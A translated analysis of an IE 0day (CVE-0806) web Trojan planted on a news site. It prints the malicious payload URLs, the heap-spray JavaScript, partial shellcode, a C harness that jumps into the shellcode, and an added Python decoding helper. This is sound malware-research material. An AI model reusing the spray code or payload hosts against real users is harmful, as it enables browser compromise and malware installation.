[Title]: IE 0day CVE0806 web Trojan sample analysis
[Author]: Quan Ge (http://riusksk.blogbus.com)
Analysis tools:
MDecoder 0.66
EditPlus 3.01
FreShow
VC 6.0
OllyDbg 1.10
Sample source:
Web site (Anhui News Network) implanted with a Trojan by hackers: http://log.mtian.net/?p=1152001
Analysis result:
Log by MDecoder:
[Root] http://www.ah.chinanews.com.cn/GuestBook/Images/con.wtxlj871/wenda./lpt9.mqhna976.asp (How is the Changan Auto stock? What will happen to it next? -- Stock --)
[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit.Ie0dayCVE0806.)
[Script] http://1029a9.3322.org:225/yy2/mj.js
[Virus] http://231ad.3322.org:225/yy2/no.exe
[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit.Ie0dayCVE0806.)
[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit.Ie0dayCVE0806.)
[Script] http://js.160ads.com/i.js
[Script] http://js.160ads.com/+s(sr)+
[Iframe] http://js.160ads.com/+s(sr)+
Code analysis:
Web Trojan:
Exploit code analysis:
index.htm:
");
}
// -->
// Set the hidden button
// Load the malicious script http://1029a9.3322.org:225/yy2/mj.js
mj.js:
function auc2() {
    a3 = new Array();                    // Array objects created here are dynamically allocated on the heap
    var a5 = 0x86000 - (a4.length * 2);  // 536 KB minus the shellcode size in bytes (a4 is the shellcode string, defined elsewhere in mj.js):
                                         // the number of filler bytes each injection block needs besides the shellcode; it is padded with NOP-like bytes
    var LFlwBa = unescape("%u0c0c%u0c0c");
    while (LFlwBa.length < a5) {         // loop bound was lost in extraction; reconstructed so the filler covers at least a5 code units
        LFlwBa += LFlwBa;                // fill each injection block with 0c0c0c0c apart from the shellcode
    }
    var a6 = LFlwBa.substring(0, a5 / 2);
    delete LFlwBa;
    for (i = 0; i < 270; i++) {
        a3[i] = a6 + a6 + a4;            // fill memory with a series of injection blocks that each contain the shellcode, implementing the heap spray
    }
}
Shellcode analysis:
First remove the "+" concatenation operators from the shellcode string, then ESC-decode it with FreShow:
...... omitted ...... \xEA\xEA\xEA\xEA\xEA\xEA\xEA
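The ESC decoding step above and the block arithmetic in auc2() as an added Python example (not code from the original post or from the sample): js_unescape and memory_image mirror what FreShow's ESC decode produces for a %u-escaped string, spray_layout reproduces a5/a6 from the loop, and lands_in_sled assumes the 270 blocks sit back to back from a chosen heap_base, which is an illustration only.

```python
import re

# The two escape forms JavaScript unescape() understands.
_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX becomes one UTF-16 code unit,
    %XX one code unit 0x00XX, other text passes through. Quotes and the
    '+' joins between string pieces are stripped first, as the page does
    by hand before feeding the string to FreShow."""
    s = re.sub(r"""["']\s*\+\s*["']""", "", s.strip().strip("\"'"))
    parts, pos = [], 0
    for m in _ESC.finditer(s):
        parts.append(s[pos:m.start()])
        parts.append(chr(int(m.group(1) or m.group(2), 16)))
        pos = m.end()
    parts.append(s[pos:])
    return "".join(parts)


def memory_image(s):
    """Bytes the decoded string occupies in memory (JS strings are UTF-16LE),
    i.e. the byte sequence the debugger later shows."""
    return js_unescape(s).encode("utf-16-le", "surrogatepass")


def spray_layout(shellcode_units, block_bytes=0x86000, blocks=270):
    """Reproduce the arithmetic of auc2(): a5 filler bytes, a6 = a5/2 code
    units of 0x0c0c, and 270 blocks of a6 + a6 + a4."""
    a5 = block_bytes - shellcode_units * 2
    a6_units = a5 // 2
    block_units = 2 * a6_units + shellcode_units
    return {
        "filler_bytes": a5,
        "sled_bytes": 2 * a6_units * 2,   # two copies of a6, 2 bytes per unit
        "block_bytes": 2 * block_units,
        "total_bytes": 2 * block_units * blocks,
    }


def lands_in_sled(addr, layout, heap_base):
    """True if addr falls inside the 0x0c0c filler of some block, assuming the
    blocks are laid out contiguously from heap_base (an assumption for
    illustration; a real heap layout is less regular)."""
    off = addr - heap_base
    if off < 0 or off >= layout["total_bytes"]:
        return False
    return off % layout["block_bytes"] < layout["sled_bytes"]
```

With a 500-unit shellcode each block is a little over 1 MB and the 270 blocks cover about 296 MB, which is why a control-flow transfer to 0x0c0c0c0c is very likely to hit filler rather than shellcode or unmapped memory.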
Use VC to write the following program:
int main()
{
    /* decoded shellcode bytes; the middle of the string is omitted here */
    char shellcode[] = "\xbc\xe4\x55\xf2\xbf\xbd\xbd\x5f\x44\x3c\x51\xbd\xbc\xbd\xbd\xbd\x36\x61" /* ...... omitted ...... */;
    __asm {
        lea eax, shellcode   /* address of the buffer on the stack */
        push eax
        ret                  /* "return" into the shellcode */
    }
    return 0;
}
Compile it with VC, load the executable in OllyDbg, and single-step (F8) into the shellcode:
0012FBAC  58       POP EAX
0012FBAD  58       POP EAX
0012FBAE  58       POP EAX
0012FBAF  58       POP EAX
0012FBB0  EB 10